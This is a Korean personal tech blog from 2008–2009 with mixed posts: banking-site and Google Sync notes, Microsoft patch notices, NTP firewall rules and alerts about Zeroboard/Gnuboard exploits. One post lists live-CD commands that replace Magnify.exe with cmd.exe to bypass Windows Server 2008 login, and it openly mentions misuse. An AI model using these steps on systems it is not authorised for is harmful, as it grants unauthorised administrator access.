IE8 으로 업그레이드를 하고 나니 하나은행 웹페이지에 접속시 장애가 발생하네요.

혹시나 하고 호환성 보기 설정에다 사이트를 등록을 해도 버튼 클릭등이 안되는

문제가 생기네요. 큰일이네요 . 오늘 중에 이체할 돈이 있는데 ;;

어떤 분들은 시스템을 재설치 하고 IE8을 설치하면 된다고 하시던데. 전 그럴 여유가 안되기

때문에.. 하나은행 측에서는 IE8에 대한 대처법이나 적절한 수정을 어서 해주셨으면 합니다.

크리에이티브 커먼즈 라이센스
Creative Commons License
2009/03/27 14:40 2009/03/27 14:40
Posted by basaaja
간혹 로컬에서 인증이 필요 없이 Windows Server 2008에 접근을 할 이유가 생길 수 있습니다. 전 관리자가 패스워드를 알려 주지 않고 나갔다던지 아니면 나쁜짓을 하기 위해 IDC에 침입(?) 해서 작업을 하시던지 여러 이유들은 많이 있겠죠.

아래의 방법은 암호 인증을 우회하는 방법에 대한 매우 짧은 번역글 입니다.

준비물 : NTFS-3G 드라이버를 제공하는 리눅스 라이브 시디

1. 리눅스 라이브 시디로 부팅을 합니다.
2. fdisk -l | grep NTFS ( NTFS를 제대로 인식했는지 확인 및 몇번 hdd 인지 체크)
3. mkdir -p /mnt/windows (마운트를 위한 디렉토리 생성)
4. mount -t ntfs-3g /dev/sda1/mnt/windows
5. cd /mnt/windows/system32/
6. mv Magnify.exe Magnify.bck
7. cp cmd.exe Magnify.exe
8. reboot

다시 Windows Server 2008 로 접근 하면 인증없이 관리자 권한으로 접근하는 것을 확인 할 수 있다고 합니다 .

참고로 저는 아직 테스트를 하지는 않았고 원본 문서에 접근하시면 더 자세한 설명을 확인 하실 수 있습니다.

원본 : http://milw0rm.com/papers/286

크리에이티브 커먼즈 라이센스
Creative Commons License
2009/02/13 08:09 2009/02/13 08:09
Posted by basaaja
요새 공개보드들이 각종 취약점 발표로 몸살을 겪고 있습니다. 

2009.02.09일 날짜로 ZeroboardXE 1.1.5 의 XSS 취약점이 milw0rm.com 에 개시 되었습니다. 

아직 제로보드 홈페이지에는 패치 관련 내용은 올라오지 않은걸로 파악 됩니다. 

http://www.milw0rm.com/exploits/8019


크리에이티브 커먼즈 라이센스
Creative Commons License
2009/02/10 19:45 2009/02/10 19:45
Posted by basaaja
TAG ,

드디어 기다리던 구글 싱크가 발표 되었네요. 꼭 필요한 기능인데 왜 없을까 의아했는데

이제서라도 사용할 수 있으니 다행인듯 하네요.

지원 되는 디바이스는 다음과 같습니다.

  • iPhone
  • BlackBerry
  • Nokia S60
  • Nokia standard
  • Sony Ericsson
  • Windows Mobile

     저의 경우는 기존에 nuevasync 를 이용해 싱크를 했었는데 이제는 바로 구글 싱크를 이용할 수 있다고 하니 방금 바꿨습니다. 뭐 nuevasync와의 더 좋은 점이나 차이점등은 보이지 않는거 같고요. (당연한 이야기지만 둘다 Exchange를 기반으로 두고 있으니깐요.)
     
    아이팟으로 테스트 결과 우선 Contacts와 Calendar 만 연동이 되며 Mail은 아이팟 안의 설정에 원래 기본으로 들어가 있습니다. ( 저는 뭣도 모르고 처음에 계정 지우고 시작했다가 난감했다죠.)

  • 크리에이티브 커먼즈 라이센스
    Creative Commons License
    2009/02/10 19:21 2009/02/10 19:21
    Posted by basaaja

    FM2 첫롤

    Nikon - FM2 2009/02/10 10:14
    역시나 첫롤은 상태가 매우 안좋군 
    이제 사진에 입문을 ㅎㅎ 
    크리에이티브 커먼즈 라이센스
    Creative Commons License
    2009/02/10 10:14 2009/02/10 10:14
    Posted by basaaja
    TAG

    공개보드의 위험성을 또 다시 증명 하네요. 제로보드는 현재 0Day 공격이 진행 중이고
    그누보드는 패치가 발표 되었네요 .

    취약 버젼 : zeroboard VERSION pl8 (07.12.17))

    Blind SQL Injection Vulnerability - zeroboard
    Secret post view Auth bypass Vulnerability - zeroboard
    Local file Inclusion Vulnerability - zeroboard
    XSS -Gnuboard
    Remote file Inclusion Vulnerability -Gnuboard

    등의 위험성이 있다고 고지 되어 있네요. 관리 하시는 분들 서버를 체크하셔야 할듯합니다.


    http://milw0rm.com/exploits/8000

    크리에이티브 커먼즈 라이센스
    Creative Commons License
    2009/02/06 16:49 2009/02/06 16:49
    Posted by basaaja
    비록 매월 1-2개의 글들뿐이 포스팅 안하고 있지만 ;; !!

    아직 바사아자 닷컴은 살아 있습니다 !!

    비록 매일 각종 로봇들과 스펨 트랙백들의 카운트만 늘어 난다고 해도

    아직 바사아자 닷컴은 살아 있습니다 !!


    ---------------------------------------------------------

    쓸말 없자 - 은근 슬쩍 올리는 2009년 01월 첫 게시글.
    크리에이티브 커먼즈 라이센스
    Creative Commons License
    2009/01/05 17:27 2009/01/05 17:27
    Posted by basaaja
    얼마전 비공개 업데이트가 뜨고 이제 정기 업데이트가 떴네요.

    SMB 관련과 XML Core 관련 업데이트 입니다.

    자세한 정보는 아래의 링크에서 확인 하세요.

    [MS08-068] SMB 취약점으로 인한 원격코드실행 문제

    [MS08-069] MS XML 코어 서비스 취약점으로 인한 원격코드실행 문제


    http://www.krcert.or.kr/secureNoticeView.do?num=292&seq=-1
    크리에이티브 커먼즈 라이센스
    Creative Commons License
    2008/11/12 11:41 2008/11/12 11:41
    Posted by basaaja
    # Allow outgoing TIME connections
    add filterlist name="TIME-Outgoing" description="외부와 TIME 통신 가능하게 설정"
    add filter filterlist="TIME-Outgoing" protocol=UDP srcaddr=ME srcport=0 dstaddr=Any dstport=123 mirrored=YES
    add rule name="Allow TIME Outgoing traffic" policy="Restrict IP" filterlist="TIME-Outgoing" filteraction="PERMIT"

    사용 도메인
    time.kriss.re.kr
    크리에이티브 커먼즈 라이센스
    Creative Commons License
    2008/11/05 10:31 2008/11/05 10:31
    Posted by basaaja
    Server Service를 이용한 원격 공격 코드가 떠서 MS에서 긴급으로 패치를 제공했습니다.

    TCP  139, 445 포트를 방화벽단에서 차단 하시던가 (설마 열어두시는 분은 없겠죠 ..)

    아래의 긴급 업데이트를 적용하셔야 합니다.

    업데이트 : http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
    자료 내용 : http://www.krcert.or.kr/secureNoticeView.do?num=287&seq=-1

    공격 코드도 떴습니다.

    http://www.milw0rm.com/exploits/6824
    크리에이티브 커먼즈 라이센스
    Creative Commons License
    2008/10/24 16:33 2008/10/24 16:33
    Posted by basaaja